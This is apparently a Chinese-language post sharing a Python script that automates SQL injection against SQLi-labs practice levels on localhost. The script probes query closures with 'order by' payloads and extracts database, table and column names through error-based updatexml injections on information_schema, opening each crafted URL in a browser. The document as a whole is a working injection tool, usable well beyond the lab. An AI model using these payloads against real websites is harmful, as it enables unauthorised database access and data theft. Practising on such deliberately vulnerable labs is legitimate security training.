order by : 利用 order by 语句 ,相当于判断 闭合
updatexml :利用xpath注入语句,打开网页来看结果
all :相当于上面2个模块一起用
关卡为 sqllab 靶场 的关卡
代码如下:
import time import webbrowser import sys mokuai = { '1 (order by)', '2 (updatexml)', '3 (all)' } for mok in mokuai: print(mok) b1 = input("---请输入模块(最前方数字)--- :") gka = { '1', '2', '3', '4', '5', '6' } for gk in gka: print(gk) s = input("---请输入关卡--- :") zifu = { "'", "')", '")', '"', "'))", '"))' } yujua = { 'database()', 'group_concat(table_name) from information_schema.tables where table_schema="xxx"', 'group_concat(column_name) from information_schema.columns where table_schema="xxx" and table_name="xxx"', 'group_concat(xxx,0x7e,xxx) from xxx', 'group_concat(xxx) from xxx' } sys.path.append("libs") if b1 == '1': for zi in zifu: aaa = "http://127.0.0.1/sqllab/Less-" + s + "/?id=1" + zi + "order by 1200 --+" bbb = "http://127.0.0.1/sqllab/Less-" + s + "/?id=1" + zi + "order by 1 --+" webbrowser.open(aaa) print(webbrowser.get()) webbrowser.open(bbb) print(webbrowser.get()) elif b1 == '2': a1 = input("---请输入闭合--- :") for i in range(1, 100): for j in yujua: print(j) print('------------------------------------------------------') yuju = input("(输入 0 停止)请输入sql注入语句 :") if yuju == '0': exit() ccc = "http://127.0.0.1/sqllab/Less-" + s + "/?id=1" + a1 + " and updatexml(1,concat(0x5e,(substr((select " + yuju + "),1)),0x5e),1) --+" webbrowser.open(ccc) print(webbrowser.get()) ccc = "http://127.0.0.1/sqllab/Less-" + s + "/?id=1" + a1 + " and updatexml(1,concat(0x5e,(substr((select " + yuju + "),32)),0x5e),1) --+" webbrowser.open(ccc) print(webbrowser.get()) ccc = "http://127.0.0.1/sqllab/Less-" + s + "/?id=1" + a1 + " and updatexml(1,concat(0x5e,(substr((select " + yuju + "),63)),0x5e),1) --+" webbrowser.open(ccc) print(webbrowser.get()) ccc = "http://127.0.0.1/sqllab/Less-" + s + "/?id=1" + a1 + " and updatexml(1,concat(0x5e,(substr((select " + yuju + "),94)),0x5e),1) --+" webbrowser.open(ccc) print(webbrowser.get()) print('------------------------------------------------------') else: for zi in zifu: aaa = "http://127.0.0.1/sqllab/Less-" + s + "/?id=1" + zi + "order by 1200 --+" bbb = "http://127.0.0.1/sqllab/Less-" + s + "/?id=1" + zi + "order by 1 --+" webbrowser.open(aaa) print(webbrowser.get()) webbrowser.open(bbb) print(webbrowser.get()) a1 = input("---请输入闭合--- :") for i in range(1, 100): for j in yujua: print(j) print('------------------------------------------------------') yuju = input("(输入 0 停止)请输入sql注入语句 :") if yuju == '0': exit() ccc = "http://127.0.0.1/sqllab/Less-" + s + "/?id=1" + a1 + " and updatexml(1,concat(0x5e,(substr((select " + yuju + "),1)),0x5e),1) --+" webbrowser.open(ccc) print(webbrowser.get()) ccc = "http://127.0.0.1/sqllab/Less-" + s + "/?id=1" + a1 + " and updatexml(1,concat(0x5e,(substr((select " + yuju + "),32)),0x5e),1) --+" webbrowser.open(ccc) print(webbrowser.get()) ccc = "http://127.0.0.1/sqllab/Less-" + s + "/?id=1" + a1 + " and updatexml(1,concat(0x5e,(substr((select " + yuju + "),63)),0x5e),1) --+" webbrowser.open(ccc) print(webbrowser.get()) ccc = "http://127.0.0.1/sqllab/Less-" + s + "/?id=1" + a1 + " and updatexml(1,concat(0x5e,(substr((select " + yuju + "),94)),0x5e),1) --+" webbrowser.open(ccc) print(webbrowser.get()) print('------------------------------------------------------')